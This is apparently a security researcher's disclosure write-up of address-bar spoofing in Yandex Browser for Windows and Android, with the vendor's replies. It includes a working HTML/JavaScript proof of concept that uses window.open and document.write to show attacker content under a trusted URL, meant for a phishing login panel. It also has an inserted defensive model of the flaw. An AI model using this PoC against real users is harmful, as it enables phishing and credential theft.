Yandex Browser - Address Bar Spoofing

Disclaimer: both vulnerabilities were reported to the Yandex Security Team and considered as dupes, so, I was not the first one who discovered them.

Yandex Browser for Windows

This issue was reported 19th July, 2016, 21:36

By making a user visit a page controlled by the attacker and using the window.open and document.write functions, it was possible to spoof the URL shown in the address bar.

Workflow:

  • Once the page loads, a function is triggered. In my PoC, the function was triggered when a button is clicked.
  • The function opens a new window by using window.open pointing to the URL that is going to be spoofed.
  • By calling document.write on that new window, we write a script that calls document.write again and writes the content; usually this content will be a phishing login panel. - My PoC used document.location to help them see the real location instead of the one that the address bar was showing.

So, the final code would be:

```html
<script>
function spoof() {
        nWindow = window.open('https:/www.google.com', '_t1');
        nWindow.document.write('<pre>Here we could place a phising login panel</pre>');
}
</script>
<input type="button" onclick="spoof()" value="PoC!">
```

The page is being hosted on my server.
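As an added illustration (not part of the original write-up and not Yandex Browser code), the sketch below models the address-bar decision that the workflow above relies on and the invariant a browser regression test would check. The browser's internals are not described here, so the "naive" rule, the tab fields and the example hosts are assumptions made for the model.

```javascript
// Simplified model of how a tab chooses the URL to display.
// All hosts and field names are constructed for this example.
function openWindow(openerOrigin, targetUrl) {
  return {
    openerOrigin,
    committedUrl: 'about:blank', // initial empty document
    pendingUrl: targetUrl,       // navigation requested, not yet committed
    contentAuthor: null,         // origin whose markup is currently rendered
  };
}

// The opener scripts the new window before the navigation commits.
function openerWrites(tab) { tab.contentAuthor = tab.openerOrigin; }

// The requested page actually loads and replaces the document.
function commitNavigation(tab) {
  tab.committedUrl = tab.pendingUrl;
  tab.pendingUrl = null;
  tab.contentAuthor = new URL(tab.committedUrl).origin;
}

// Assumed weak rule: always prefer the pending URL.
const naiveRule = (tab) => tab.pendingUrl || tab.committedUrl;

// Hardened rule: stop showing the pending URL once another
// window has written into the initial document.
const hardenedRule = (tab) =>
  tab.pendingUrl && tab.contentAuthor === null ? tab.pendingUrl : tab.committedUrl;

// Invariant: the shown URL must not name an origin that did not
// author the rendered content (about:blank claims no origin).
function isSpoofed(tab, shownUrl) {
  if (tab.contentAuthor === null || shownUrl === 'about:blank') return false;
  return new URL(shownUrl).origin !== tab.contentAuthor;
}

// Replays the write-up's sequence: open a window, then write into it.
function replayWorkflow(rule) {
  const tab = openWindow('https://untrusted.example', 'https://login.example/');
  openerWrites(tab);
  const shown = rule(tab);
  return { shown, spoofed: isSpoofed(tab, shown) };
}

// Control case: the navigation commits and nobody writes into the window.
function replayNormalLoad(rule) {
  const tab = openWindow('https://untrusted.example', 'https://login.example/');
  commitNavigation(tab);
  const shown = rule(tab);
  return { shown, spoofed: isSpoofed(tab, shown) };
}
```
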

Result

Final email about this vulnerability was:
Hello!

Unfortunately the issue had been reported by another researcher before we got your report. We've been working on the fix for several days and it will be rolled out shortly.

Have a nice day!
--
Vasiliy Kuznetsov Yandex Security Team


Yandex Browser for Android

This issue was reported 19th July, 2016, 18:41

The workflow is exactly the same again.

Before running the PoC:


![ResultMobile1](http://i.imgur.com/jDPQ1mp.jpg)

After running the PoC:


![ResultMobile2](http://i.imgur.com/yOQKHwH.jpg)

Final emails about this vulnerability were:
Hello, Miguel Ángel!

As for Android, I'll check it shortly because it looks similar to one report we got the other day. I'll let you know in a few days.

Have a great weekend!

Hello, Miguel Ángel!

I'm sorry, but the same bug had been reported by another researcher before we'd got your report. That's why we can't offer you a reward.

I hope you've enjoyed this write up.

If you're the one who reported these vulnerabilities before me and you want me to remove this post, please send me a message via Twitter.

Kind regards!
